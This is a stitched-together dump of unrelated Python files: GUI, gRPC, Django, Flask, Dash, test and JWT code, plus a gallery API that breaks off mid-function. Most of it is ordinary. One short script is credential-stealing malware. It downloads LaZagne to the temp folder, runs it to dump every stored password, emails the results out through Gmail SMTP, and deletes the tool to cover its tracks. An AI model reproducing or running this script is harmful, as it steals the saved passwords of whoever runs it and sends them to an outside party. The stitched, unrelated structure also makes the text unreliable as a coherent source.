def __init__(
self,
tk_flowchart=None,
node=None,
canvas=None,
x=120,
y=20,
w=200,
h=50,
my_logger=logger,
keyword_metadata=None,
):
"""Initialize the graphical Tk DFTB+ optimization step
Keyword arguments:
"""
self.results_widgets = []
super().__init__(
tk_flowchart=tk_flowchart,
node=node,
canvas=canvas,
x=x,
y=y,
w=w,
h=h,
my_logger=my_logger,
keyword_metadata=keyword_metadata,
)
def right_click(self, event):
"""Probably need to add our dialog..."""
super().right_click(event)
self.popup_menu.add_command(label="Edit..", command=self.edit)
self.popup_menu.tk_popup(event.x_root, event.y_root, 0)
def create_dialog(
self, title="Edit DFTB+ Optimization Step", calculation="optimization"
):
"""Create the dialog!"""
self.logger.debug("Creating the dialog")
super().create_dialog(title=title, calculation=calculation)
# Create all the widgets
P = self.node.parameters
# Frame to isolate widgets
opt_frame = self["optimization frame"] = ttk.LabelFrame(
self["frame"],
borderwidth=4,
relief="sunken",
text="Optimization Parameters",
labelanchor="n",
padding=10,
)
for key in dftbplus_step.OptimizationParameters.parameters:
self[key] = P[key].widget(opt_frame)
self.logger.debug("Finished creating the dialog")
def reset_dialog(self, widget=None):
super().reset_dialog()
row = 0
self["optimization frame"].grid(row=row, column=1, sticky=tk.EW)
row += 1
# And the widgets in our frame
self.reset_optimization_frame()
return row
def reset_optimization_frame(self):
"""Layout the optimization frame according to the current values.
SD CG gDIIS LBFGS FIRE
------------------ ------------------- ------------------- ------------------- --------
MovedAtoms MovedAtoms MovedAtoms MovedAtoms TimeStep
MaxForceComponent MaxForceComponent MaxForceComponent MaxForceComponent
MaxSteps MaxSteps MaxSteps MaxSteps
OutputPrefix OutputPrefix OutputPrefix OutputPrefix
AppendGeometries AppendGeometries AppendGeometries AppendGeometries
Constraints Constraints Constraints Constraints
LatticeOpt LatticeOpt LatticeOpt LatticeOpt
FixAngles FixAngles FixAngles FixAngles
FixLengths
Isotropic Isotropic Isotropic Isotropic
Pressure Pressure Pressure Pressure
MaxAtomStep MaxAtomStep MaxAtomStep
MaxLatticeStep MaxLatticeStep MaxLatticeStep MaxLatticeStep
ConvergentForcesOnly ConvergentForcesOnly ConvergentForcesOnly ConvergentForcesOnly
StepSize Alpha Memory
Generations LineSearch
""" # noqa: E501
frame = self["optimization frame"]
for slave in frame.grid_slaves():
slave.grid_forget()
method = self["optimization method"].get()
widgets = []
widgets1 = []
row = 0
w = self["optimization method"]
w.grid(row=row, column=0, columnspan=2, sticky=tk.EW)
widgets.append(w)
row += 1
if method == "Steepest descents":
w = self["StepSize"]
w.grid(row=row, column=1, sticky=tk.EW)
widgets1.append(w)
row += 1
elif "gDIIS" in method:
w = self["Alpha"]
w.grid(row=row, column=1, sticky=tk.EW)
widgets1.append(w)
row += 1
w = self["Generations"]
w.grid(row=row, column=1, sticky=tk.EW)
widgets1.append(w)
row += 1
elif "LBFGS" in method:
w = self["Memory"]
w.grid(row=row, column=1, sticky=tk.EW)
widgets1.append(w)
row += 1
w = self["LineSearch"]
w.grid(row=row, column=1, sticky=tk.EW)
widgets1.append(w)
row += 1
for widget in (
"MaxForceComponent",
"MaxSteps",
"MaxAtomStep",
"stop_if_scc_fails",
):
w = self[widget]
w.grid(row=row, column=0, columnspan=2, sticky=tk.EW)
widgets.append(w)
row += 1
return row
| [
"logging.getLogger",
"tkinter.ttk.LabelFrame"
]
| [((174, 201), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (191, 201), False, 'import logging\n'), ((1550, 1677), 'tkinter.ttk.LabelFrame', 'ttk.LabelFrame', (["self['frame']"], {'borderwidth': '(4)', 'relief': '"""sunken"""', 'text': '"""Optimization Parameters"""', 'labelanchor': '"""n"""', 'padding': '(10)'}), "(self['frame'], borderwidth=4, relief='sunken', text=\n 'Optimization Parameters', labelanchor='n', padding=10)\n", (1564, 1677), True, 'import tkinter.ttk as ttk\n')] |
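# Standalone sketch of the relayout pattern reset_optimization_frame() uses: every
# widget already gridded into the frame is detached with grid_forget(), then a
# method-dependent subset is gridded again. The widget names and mapping below are
# illustrative, not part of the dftbplus_step API.
import tkinter as tk
import tkinter.ttk as ttk

root = tk.Tk()
frame = ttk.LabelFrame(root, text="Optimization Parameters", padding=10)
frame.grid(row=0, column=0, sticky=tk.EW)
widgets = {name: ttk.Label(frame, text=name) for name in ("StepSize", "Alpha", "Memory")}
extra_widgets = {"Steepest descents": ["StepSize"], "gDIIS": ["Alpha"], "LBFGS": ["Memory"]}

def relayout(method):
    # detach everything, then grid only the widgets this method needs
    for slave in frame.grid_slaves():
        slave.grid_forget()
    for row, name in enumerate(extra_widgets.get(method, [])):
        widgets[name].grid(row=row, column=0, sticky=tk.EW)

relayout("LBFGS")
# root.mainloop()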
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import grpc
from skywalking.protocol.common.Common_pb2 import KeyStringValuePair
from skywalking.protocol.language_agent.Tracing_pb2_grpc import TraceSegmentReportServiceStub
from skywalking.protocol.logging.Logging_pb2_grpc import LogReportServiceStub
from skywalking.protocol.management.Management_pb2 import InstancePingPkg, InstanceProperties
from skywalking.protocol.management.Management_pb2_grpc import ManagementServiceStub
from skywalking.protocol.profile.Profile_pb2 import ProfileTaskCommandQuery
from skywalking.protocol.profile.Profile_pb2_grpc import ProfileTaskStub
from skywalking import config
from skywalking.client import ServiceManagementClient, TraceSegmentReportService, ProfileTaskChannelService, \
LogDataReportService
from skywalking.command import command_service
from skywalking.loggings import logger
from skywalking.profile import profile_task_execution_service
class GrpcServiceManagementClient(ServiceManagementClient):
def __init__(self, channel: grpc.Channel):
self.service_stub = ManagementServiceStub(channel)
def send_instance_props(self):
self.service_stub.reportInstanceProperties(InstanceProperties(
service=config.service_name,
serviceInstance=config.service_instance,
properties=[KeyStringValuePair(key='language', value='Python')],
))
def send_heart_beat(self):
logger.debug(
'service heart beats, [%s], [%s]',
config.service_name,
config.service_instance,
)
self.service_stub.keepAlive(InstancePingPkg(
service=config.service_name,
serviceInstance=config.service_instance,
))
class GrpcTraceSegmentReportService(TraceSegmentReportService):
def __init__(self, channel: grpc.Channel):
self.report_stub = TraceSegmentReportServiceStub(channel)
def report(self, generator):
self.report_stub.collect(generator)
class GrpcLogDataReportService(LogDataReportService):
def __init__(self, channel: grpc.Channel):
self.report_stub = LogReportServiceStub(channel)
def report(self, generator):
self.report_stub.collect(generator)
class GrpcProfileTaskChannelService(ProfileTaskChannelService):
def __init__(self, channel: grpc.Channel):
self.task_stub = ProfileTaskStub(channel)
def do_query(self):
query = ProfileTaskCommandQuery(
service=config.service_name,
serviceInstance=config.service_instance,
lastCommandTime=profile_task_execution_service.get_last_command_create_time()
)
commands = self.task_stub.getProfileTaskCommands(query)
command_service.receive_command(commands)
| [
"skywalking.protocol.management.Management_pb2.InstancePingPkg",
"skywalking.protocol.language_agent.Tracing_pb2_grpc.TraceSegmentReportServiceStub",
"skywalking.protocol.common.Common_pb2.KeyStringValuePair",
"skywalking.command.command_service.receive_command",
"skywalking.loggings.logger.debug",
"skywalking.protocol.management.Management_pb2_grpc.ManagementServiceStub",
"skywalking.protocol.profile.Profile_pb2_grpc.ProfileTaskStub",
"skywalking.profile.profile_task_execution_service.get_last_command_create_time",
"skywalking.protocol.logging.Logging_pb2_grpc.LogReportServiceStub"
]
| [((1819, 1849), 'skywalking.protocol.management.Management_pb2_grpc.ManagementServiceStub', 'ManagementServiceStub', (['channel'], {}), '(channel)\n', (1840, 1849), False, 'from skywalking.protocol.management.Management_pb2_grpc import ManagementServiceStub\n'), ((2179, 2277), 'skywalking.loggings.logger.debug', 'logger.debug', (['"""service heart beats, [%s], [%s]"""', 'config.service_name', 'config.service_instance'], {}), "('service heart beats, [%s], [%s]', config.service_name, config\n .service_instance)\n", (2191, 2277), False, 'from skywalking.loggings import logger\n'), ((2618, 2656), 'skywalking.protocol.language_agent.Tracing_pb2_grpc.TraceSegmentReportServiceStub', 'TraceSegmentReportServiceStub', (['channel'], {}), '(channel)\n', (2647, 2656), False, 'from skywalking.protocol.language_agent.Tracing_pb2_grpc import TraceSegmentReportServiceStub\n'), ((2865, 2894), 'skywalking.protocol.logging.Logging_pb2_grpc.LogReportServiceStub', 'LogReportServiceStub', (['channel'], {}), '(channel)\n', (2885, 2894), False, 'from skywalking.protocol.logging.Logging_pb2_grpc import LogReportServiceStub\n'), ((3111, 3135), 'skywalking.protocol.profile.Profile_pb2_grpc.ProfileTaskStub', 'ProfileTaskStub', (['channel'], {}), '(channel)\n', (3126, 3135), False, 'from skywalking.protocol.profile.Profile_pb2_grpc import ProfileTaskStub\n'), ((3470, 3511), 'skywalking.command.command_service.receive_command', 'command_service.receive_command', (['commands'], {}), '(commands)\n', (3501, 3511), False, 'from skywalking.command import command_service\n'), ((2356, 2446), 'skywalking.protocol.management.Management_pb2.InstancePingPkg', 'InstancePingPkg', ([], {'service': 'config.service_name', 'serviceInstance': 'config.service_instance'}), '(service=config.service_name, serviceInstance=config.\n service_instance)\n', (2371, 2446), False, 'from skywalking.protocol.management.Management_pb2 import InstancePingPkg, InstanceProperties\n'), ((3325, 3386), 'skywalking.profile.profile_task_execution_service.get_last_command_create_time', 'profile_task_execution_service.get_last_command_create_time', ([], {}), '()\n', (3384, 3386), False, 'from skywalking.profile import profile_task_execution_service\n'), ((2075, 2125), 'skywalking.protocol.common.Common_pb2.KeyStringValuePair', 'KeyStringValuePair', ([], {'key': '"""language"""', 'value': '"""Python"""'}), "(key='language', value='Python')\n", (2093, 2125), False, 'from skywalking.protocol.common.Common_pb2 import KeyStringValuePair\n')] |
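# Sketch of how these clients are wired together, assuming a plain insecure gRPC
# channel to a local OAP collector; the address and the surrounding agent bootstrap
# are assumptions, not part of this module.
import grpc

channel = grpc.insecure_channel('127.0.0.1:11800')
management = GrpcServiceManagementClient(channel)
management.send_instance_props()
management.send_heart_beat()
trace_reporter = GrpcTraceSegmentReportService(channel)
# trace_reporter.report(segment_generator)  # generator yielding SegmentObject messages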
# Generated by Django 3.0.3 on 2020-02-07 19:59
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('coingate', '0003_auto_20200207_1513'),
]
operations = [
migrations.RemoveField(
model_name='payment',
name='token',
),
migrations.AddField(
model_name='payment',
name='expire_at',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AddField(
model_name='payment',
name='pay_amount',
field=models.DecimalField(blank=True, decimal_places=1, max_digits=10, null=True),
),
migrations.AddField(
model_name='payment',
name='payment_address',
field=models.CharField(blank=True, max_length=100, null=True),
),
migrations.AlterField(
model_name='payment',
name='created_at',
field=models.DateTimeField(auto_now_add=True, null=True),
),
migrations.AlterField(
model_name='payment',
name='price_currency',
field=models.CharField(choices=[('USD', 'USD'), ('EUR', 'EUR'), ('BTC', 'BTC'), ('LTC', 'LTC'), ('ETH', 'ETH')], default='USD', max_length=10),
),
migrations.AlterField(
model_name='payment',
name='receive_currency',
field=models.CharField(choices=[('USD', 'USD'), ('EUR', 'EUR'), ('BTC', 'BTC'), ('LTC', 'LTC'), ('ETH', 'ETH')], default='BTC', max_length=10),
),
migrations.AlterField(
model_name='payment',
name='status',
field=models.CharField(choices=[('new', 'Newly created invoice'), ('pending', 'Awaiting payment'), ('confirming', 'Awaiting blockchain network confirmation'), ('paid', 'Confirmed'), ('invalid', 'Rejected'), ('expired', 'Expired'), ('canceled', 'Canceled'), ('refunded', 'Refunded')], default='new', max_length=10),
),
]
| [
"django.db.models.DateTimeField",
"django.db.models.DecimalField",
"django.db.migrations.RemoveField",
"django.db.models.CharField"
]
| [((236, 294), 'django.db.migrations.RemoveField', 'migrations.RemoveField', ([], {'model_name': '"""payment"""', 'name': '"""token"""'}), "(model_name='payment', name='token')\n", (258, 294), False, 'from django.db import migrations, models\n'), ((442, 485), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'blank': '(True)', 'null': '(True)'}), '(blank=True, null=True)\n', (462, 485), False, 'from django.db import migrations, models\n'), ((610, 685), 'django.db.models.DecimalField', 'models.DecimalField', ([], {'blank': '(True)', 'decimal_places': '(1)', 'max_digits': '(10)', 'null': '(True)'}), '(blank=True, decimal_places=1, max_digits=10, null=True)\n', (629, 685), False, 'from django.db import migrations, models\n'), ((815, 870), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(100)', 'null': '(True)'}), '(blank=True, max_length=100, null=True)\n', (831, 870), False, 'from django.db import migrations, models\n'), ((997, 1047), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'auto_now_add': '(True)', 'null': '(True)'}), '(auto_now_add=True, null=True)\n', (1017, 1047), False, 'from django.db import migrations, models\n'), ((1178, 1319), 'django.db.models.CharField', 'models.CharField', ([], {'choices': "[('USD', 'USD'), ('EUR', 'EUR'), ('BTC', 'BTC'), ('LTC', 'LTC'), ('ETH', 'ETH')\n ]", 'default': '"""USD"""', 'max_length': '(10)'}), "(choices=[('USD', 'USD'), ('EUR', 'EUR'), ('BTC', 'BTC'), (\n 'LTC', 'LTC'), ('ETH', 'ETH')], default='USD', max_length=10)\n", (1194, 1319), False, 'from django.db import migrations, models\n'), ((1447, 1588), 'django.db.models.CharField', 'models.CharField', ([], {'choices': "[('USD', 'USD'), ('EUR', 'EUR'), ('BTC', 'BTC'), ('LTC', 'LTC'), ('ETH', 'ETH')\n ]", 'default': '"""BTC"""', 'max_length': '(10)'}), "(choices=[('USD', 'USD'), ('EUR', 'EUR'), ('BTC', 'BTC'), (\n 'LTC', 'LTC'), ('ETH', 'ETH')], default='BTC', max_length=10)\n", (1463, 1588), False, 'from django.db import migrations, models\n'), ((1706, 2031), 'django.db.models.CharField', 'models.CharField', ([], {'choices': "[('new', 'Newly created invoice'), ('pending', 'Awaiting payment'), (\n 'confirming', 'Awaiting blockchain network confirmation'), ('paid',\n 'Confirmed'), ('invalid', 'Rejected'), ('expired', 'Expired'), (\n 'canceled', 'Canceled'), ('refunded', 'Refunded')]", 'default': '"""new"""', 'max_length': '(10)'}), "(choices=[('new', 'Newly created invoice'), ('pending',\n 'Awaiting payment'), ('confirming',\n 'Awaiting blockchain network confirmation'), ('paid', 'Confirmed'), (\n 'invalid', 'Rejected'), ('expired', 'Expired'), ('canceled', 'Canceled'\n ), ('refunded', 'Refunded')], default='new', max_length=10)\n", (1722, 2031), False, 'from django.db import migrations, models\n')] |
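# Sketch of the Payment model state these operations move toward; the field list is
# reconstructed from the migration itself and is an assumption, not the actual
# coingate/models.py.
from django.db import models

CURRENCIES = [('USD', 'USD'), ('EUR', 'EUR'), ('BTC', 'BTC'), ('LTC', 'LTC'), ('ETH', 'ETH')]

class Payment(models.Model):
    created_at = models.DateTimeField(auto_now_add=True, null=True)
    expire_at = models.DateTimeField(blank=True, null=True)
    pay_amount = models.DecimalField(blank=True, decimal_places=1, max_digits=10, null=True)
    payment_address = models.CharField(blank=True, max_length=100, null=True)
    price_currency = models.CharField(choices=CURRENCIES, default='USD', max_length=10)
    receive_currency = models.CharField(choices=CURRENCIES, default='BTC', max_length=10)
    status = models.CharField(max_length=10, default='new')  # choices as listed in the migration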
import toml
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
app = Flask(__name__, instance_relative_config=True)
app.config.from_file("config.toml", load=toml.load)
db = SQLAlchemy(app)
@app.before_first_request
def create_table():
db.create_all()
from space_trace import views, cli
| [
"flask_sqlalchemy.SQLAlchemy",
"flask.Flask"
]
| [((84, 130), 'flask.Flask', 'Flask', (['__name__'], {'instance_relative_config': '(True)'}), '(__name__, instance_relative_config=True)\n', (89, 130), False, 'from flask import Flask\n'), ((188, 203), 'flask_sqlalchemy.SQLAlchemy', 'SQLAlchemy', (['app'], {}), '(app)\n', (198, 203), False, 'from flask_sqlalchemy import SQLAlchemy\n')] |
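# Example of the instance/config.toml this app loads via app.config.from_file();
# the keys and values are illustrative assumptions (Flask keeps only uppercase keys).
import toml

example = toml.loads('''
SECRET_KEY = "change-me"
SQLALCHEMY_DATABASE_URI = "sqlite:///space_trace.db"
SQLALCHEMY_TRACK_MODIFICATIONS = false
''')
assert example["SQLALCHEMY_DATABASE_URI"].startswith("sqlite")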
import dash
from dash.dependencies import Input, Output
import dash_html_components as html
import dash_core_components as dcc
app = dash.Dash(__name__)
app.layout = html.Div([
dcc.Textarea(
id='textarea-example',
value='Textarea content initialized\nwith multiple lines of text',
style={'width': '100%', 'height': 300},
),
html.Div(id='textarea-example-output', style={'whiteSpace': 'pre-line'})
])
@app.callback(
Output('textarea-example-output', 'children'),
[Input('textarea-example', 'value')]
)
def update_output(value):
return 'You have entered: \n{}'.format(value)
if __name__ == '__main__':
app.run_server(debug=True)
| [
"dash.dependencies.Output",
"dash_core_components.Textarea",
"dash.dependencies.Input",
"dash.Dash",
"dash_html_components.Div"
]
| [((134, 153), 'dash.Dash', 'dash.Dash', (['__name__'], {}), '(__name__)\n', (143, 153), False, 'import dash\n'), ((458, 503), 'dash.dependencies.Output', 'Output', (['"""textarea-example-output"""', '"""children"""'], {}), "('textarea-example-output', 'children')\n", (464, 503), False, 'from dash.dependencies import Input, Output\n'), ((183, 338), 'dash_core_components.Textarea', 'dcc.Textarea', ([], {'id': '"""textarea-example"""', 'value': '"""Textarea content initialized\nwith multiple lines of text"""', 'style': "{'width': '100%', 'height': 300}"}), '(id=\'textarea-example\', value=\n """Textarea content initialized\nwith multiple lines of text""", style={\n \'width\': \'100%\', \'height\': 300})\n', (195, 338), True, 'import dash_core_components as dcc\n'), ((362, 434), 'dash_html_components.Div', 'html.Div', ([], {'id': '"""textarea-example-output"""', 'style': "{'whiteSpace': 'pre-line'}"}), "(id='textarea-example-output', style={'whiteSpace': 'pre-line'})\n", (370, 434), True, 'import dash_html_components as html\n'), ((510, 544), 'dash.dependencies.Input', 'Input', (['"""textarea-example"""', '"""value"""'], {}), "('textarea-example', 'value')\n", (515, 544), False, 'from dash.dependencies import Input, Output\n')] |
import pytest
from selenium.common.exceptions import WebDriverException
from wrapped_driver import WrappedDriver
def test_empty_chromedriver_path():
"""Assert error is raised if no chromedriver path is used"""
with pytest.raises(WebDriverException):
WrappedDriver(executable_path="", headless=True)
def test_no_chromedriver_path():
"""Assert error is raised if no chromedriver path is used"""
with pytest.raises(TypeError):
WrappedDriver(headless=True)
| [
"pytest.raises",
"wrapped_driver.WrappedDriver"
]
| [((226, 259), 'pytest.raises', 'pytest.raises', (['WebDriverException'], {}), '(WebDriverException)\n', (239, 259), False, 'import pytest\n'), ((269, 317), 'wrapped_driver.WrappedDriver', 'WrappedDriver', ([], {'executable_path': '""""""', 'headless': '(True)'}), "(executable_path='', headless=True)\n", (282, 317), False, 'from wrapped_driver import WrappedDriver\n'), ((427, 451), 'pytest.raises', 'pytest.raises', (['TypeError'], {}), '(TypeError)\n', (440, 451), False, 'import pytest\n'), ((461, 489), 'wrapped_driver.WrappedDriver', 'WrappedDriver', ([], {'headless': '(True)'}), '(headless=True)\n', (474, 489), False, 'from wrapped_driver import WrappedDriver\n')] |
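# Minimal sketch (an assumption, not the real wrapped_driver module) of a wrapper
# whose constructor behaves the way these tests expect: executable_path is a required
# argument (omitting it raises TypeError) and an empty path raises WebDriverException
# before Selenium is ever started.
from selenium.common.exceptions import WebDriverException

class SketchWrappedDriver:
    def __init__(self, executable_path, headless=False):
        if not executable_path:
            raise WebDriverException("a chromedriver executable path is required")
        self.executable_path = executable_path
        self.headless = headless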
"""
transforms.py is for shape-preserving functions.
"""
import numpy as np
def shift(values: np.ndarray, periods: int, axis: int, fill_value) -> np.ndarray:
new_values = values
if periods == 0 or values.size == 0:
return new_values.copy()
# make sure array sent to np.roll is c_contiguous
f_ordered = values.flags.f_contiguous
if f_ordered:
new_values = new_values.T
axis = new_values.ndim - axis - 1
if new_values.size:
new_values = np.roll(
new_values,
np.intp(periods),
axis=axis,
)
axis_indexer = [slice(None)] * values.ndim
if periods > 0:
axis_indexer[axis] = slice(None, periods)
else:
axis_indexer[axis] = slice(periods, None)
new_values[tuple(axis_indexer)] = fill_value
# restore original order
if f_ordered:
new_values = new_values.T
return new_values
| [
"numpy.intp"
]
| [((564, 580), 'numpy.intp', 'np.intp', (['periods'], {}), '(periods)\n', (571, 580), True, 'import numpy as np\n')] |
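# Usage sketch of shift(): values are rolled along the axis and the vacated slots
# take fill_value.
import numpy as np

arr = np.array([1.0, 2.0, 3.0, 4.0])
print(shift(arr, periods=1, axis=0, fill_value=np.nan))   # [nan  1.  2.  3.]
print(shift(arr, periods=-2, axis=0, fill_value=0.0))    # [3. 4. 0. 0.]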
from abc import ABCMeta, abstractmethod
from frontegg.helpers.frontegg_urls import frontegg_urls
import typing
import jwt
import requests
from frontegg.helpers.logger import logger
from jwt import InvalidTokenError
class IdentityClientMixin(metaclass=ABCMeta):
__publicKey = None
@property
@abstractmethod
def vendor_session_request(self) -> requests.Session:
pass
@property
@abstractmethod
def should_refresh_vendor_token(self) -> bool:
pass
@abstractmethod
def refresh_vendor_token(self) -> None:
pass
def get_public_key(self) -> str:
if self.__publicKey:
return self.__publicKey
logger.info('could not find public key locally, will fetch public key')
reties = 0
while reties < 10:
try:
self.__publicKey = self.fetch_public_key()
return self.__publicKey
except Exception as e:
reties = reties + 1
logger.error(
'could not get public key from frontegg, retry number - ' + str(reties) + ', ' + str(e))
logger.error('failed to get public key in all retries')
def fetch_public_key(self) -> str:
if self.should_refresh_vendor_token:
self.refresh_vendor_token()
response = self.vendor_session_request.get(
frontegg_urls.identity_service['vendor_config'])
response.raise_for_status()
data = response.json()
return data.get('publicKey')
def decode_jwt(self, authorization_header, verify: typing.Optional[bool] = True):
if not authorization_header:
raise InvalidTokenError('Authorization headers is missing')
logger.debug('found authorization header: ' +
str(authorization_header))
jwt_token = authorization_header.replace('Bearer ', '')
if verify:
public_key = self.get_public_key()
logger.debug('got public key' + str(public_key))
decoded = jwt.decode(jwt_token, public_key, algorithms='RS256')
else:
decoded = jwt.decode(jwt_token, algorithms='RS256', verify=False)
logger.info('jwt was decoded successfully')
logger.debug('JWT value - ' + str(decoded))
return decoded
| [
"jwt.decode",
"frontegg.helpers.logger.logger.info",
"jwt.InvalidTokenError",
"frontegg.helpers.logger.logger.error"
]
| [((681, 752), 'frontegg.helpers.logger.logger.info', 'logger.info', (['"""could not find public key locally, will fetch public key"""'], {}), "('could not find public key locally, will fetch public key')\n", (692, 752), False, 'from frontegg.helpers.logger import logger\n'), ((1134, 1189), 'frontegg.helpers.logger.logger.error', 'logger.error', (['"""failed to get public key in all retries"""'], {}), "('failed to get public key in all retries')\n", (1146, 1189), False, 'from frontegg.helpers.logger import logger\n'), ((2200, 2243), 'frontegg.helpers.logger.logger.info', 'logger.info', (['"""jwt was decoded successfully"""'], {}), "('jwt was decoded successfully')\n", (2211, 2243), False, 'from frontegg.helpers.logger import logger\n'), ((1676, 1729), 'jwt.InvalidTokenError', 'InvalidTokenError', (['"""Authorization headers is missing"""'], {}), "('Authorization headers is missing')\n", (1693, 1729), False, 'from jwt import InvalidTokenError\n'), ((2045, 2098), 'jwt.decode', 'jwt.decode', (['jwt_token', 'public_key'], {'algorithms': '"""RS256"""'}), "(jwt_token, public_key, algorithms='RS256')\n", (2055, 2098), False, 'import jwt\n'), ((2135, 2190), 'jwt.decode', 'jwt.decode', (['jwt_token'], {'algorithms': '"""RS256"""', 'verify': '(False)'}), "(jwt_token, algorithms='RS256', verify=False)\n", (2145, 2190), False, 'import jwt\n')] |
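# Minimal sketch of a concrete client built on this mixin; the vendor-token handling
# below is an illustrative assumption, not the real frontegg client implementation.
import requests

class SketchIdentityClient(IdentityClientMixin):
    def __init__(self):
        self._session = requests.Session()

    @property
    def vendor_session_request(self) -> requests.Session:
        return self._session

    @property
    def should_refresh_vendor_token(self) -> bool:
        return 'x-access-token' not in self._session.headers

    def refresh_vendor_token(self) -> None:
        # would call the frontegg vendor auth endpoint and store the returned JWT
        self._session.headers['x-access-token'] = '<vendor-jwt>'

# client = SketchIdentityClient()
# claims = client.decode_jwt(headers.get('Authorization'), verify=True)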
#!/usr/bin/env python3
import requests
import subprocess
import smtplib
import re
import os
import tempfile
def download(url):
get_response = requests.get(url)
file_name = url.split("/")[-1]
with open(file_name, "wb") as f:
f.write(get_response.content)
def send_mail(email, password, message):
server = smtplib.SMTP_SSL("smtp.gmail.com", "465")
server.ehlo()
server.login(email, password)
server.sendmail(email, email, message)
server.quit()
temp_dir = tempfile.gettempdir()
os.chdir(temp_dir)
download("https://github.com/AlessandroZ/LaZagne/releases/download/2.4.3/lazagne.exe") # LaZagne
result = subprocess.check_output("lazagne.exe all", shell=True)
send_mail("<EMAIL>", "yourpassword", result)
os.remove("lazagne.exe")
| [
"subprocess.check_output",
"smtplib.SMTP_SSL",
"requests.get",
"os.chdir",
"tempfile.gettempdir",
"os.remove"
]
| [((500, 521), 'tempfile.gettempdir', 'tempfile.gettempdir', ([], {}), '()\n', (519, 521), False, 'import tempfile\n'), ((522, 540), 'os.chdir', 'os.chdir', (['temp_dir'], {}), '(temp_dir)\n', (530, 540), False, 'import os\n'), ((649, 703), 'subprocess.check_output', 'subprocess.check_output', (['"""lazagne.exe all"""'], {'shell': '(True)'}), "('lazagne.exe all', shell=True)\n", (672, 703), False, 'import subprocess\n'), ((749, 773), 'os.remove', 'os.remove', (['"""lazagne.exe"""'], {}), "('lazagne.exe')\n", (758, 773), False, 'import os\n'), ((148, 165), 'requests.get', 'requests.get', (['url'], {}), '(url)\n', (160, 165), False, 'import requests\n'), ((332, 373), 'smtplib.SMTP_SSL', 'smtplib.SMTP_SSL', (['"""smtp.gmail.com"""', '"""465"""'], {}), "('smtp.gmail.com', '465')\n", (348, 373), False, 'import smtplib\n')] |
from SmartAPI.rdf.List import List
class LinkedList(List):
def __init__(self):
List.__init__(self)
| [
"SmartAPI.rdf.List.List.__init__"
]
| [((93, 112), 'SmartAPI.rdf.List.List.__init__', 'List.__init__', (['self'], {}), '(self)\n', (106, 112), False, 'from SmartAPI.rdf.List import List\n')] |
##################################################################################################
# Copyright (c) 2012 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to use,
# copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the
# Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
# IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
##################################################################################################
"""
Gallery API
::
GET / Lists the galleries currently visible by the current user
POST / Creates a gallery object
GET /id Gallery object if visible by the current user
PUT /id Adds image or video objects to the gallery
DELETE /id Removes image or video objects from the gallery
GET /filter Returns a filtered list of image and video objects
"""
import time
import functools
import logging
import requests
from django.core.mail import mail_managers
from django.http import JsonResponse
from django.core.exceptions import ImproperlyConfigured, PermissionDenied
from django.db.models import Q, Count
from django.db import connection
from django.db.utils import ProgrammingError
from django.template.loader import render_to_string
from django.views.decorators.http import require_POST
from django.contrib.contenttypes.models import ContentType
from django.contrib.auth.decorators import login_required
from django.conf import settings
import six
import json
try:
from haystack.query import SearchQuerySet
HAYSTACK = True
except (ImportError, ImproperlyConfigured):
HAYSTACK = False
from frog.models import (
Gallery,
Image,
Video,
Group,
GallerySubscription,
SiteConfig,
Piece,
)
from frog.common import Result, getObjectsFromGuids, getClientIP
LOGGER = logging.getLogger("frog")
try:
QUERY_MODELS = [
_
for _ in ContentType.objects.filter(app_label="frog")
if issubclass(_.model_class(), Piece)
]
except ProgrammingError:
pass
BATCH_LENGTH = 75
def index(request, obj_id=None):
"""Handles a request based on method and calls the appropriate function"""
if request.method == "GET":
return get(request, obj_id)
elif request.method == "POST":
return post(request)
elif request.method == "PUT":
return put(request, obj_id)
elif request.method == "DELETE":
return delete(request, obj_id)
def get(request, obj_id=None):
if obj_id:
obj = Gallery.objects.get(pk=obj_id)
if obj.security != Gallery.PUBLIC and request.user.is_anonymous:
raise PermissionDenied
else:
res = Result()
personal = []
clearance = Gallery.PUBLIC
if request.user.is_authenticated:
personal = Gallery.objects.filter(
security=Gallery.PERSONAL, owner=request.user
)
try:
clearance = request.user.frog_prefs.first().clearance
except AttributeError:
clearance = Gallery.PUBLIC
# Staff members should see everything
if request.user.is_staff:
clearance = Gallery.GUARDED
objects = Gallery.objects.filter(security__lte=clearance)
ids = []
for gallery in objects:
if gallery.security == Gallery.PERSONAL:
continue
if gallery.id in ids:
continue
ids.append(gallery.id)
res.append(gallery.json())
for gallery in personal:
res.append(gallery.json())
return JsonResponse(res.asDict())
@login_required
def post(request):
""" Create a Gallery """
defaultname = "New Gallery %i" % Gallery.objects.all().count()
data = json.loads(request.body)["body"]
title = data.get("title", defaultname)
description = data.get("description", "")
security = int(
data.get("security", request.user.frog_prefs.first().clearance)
)
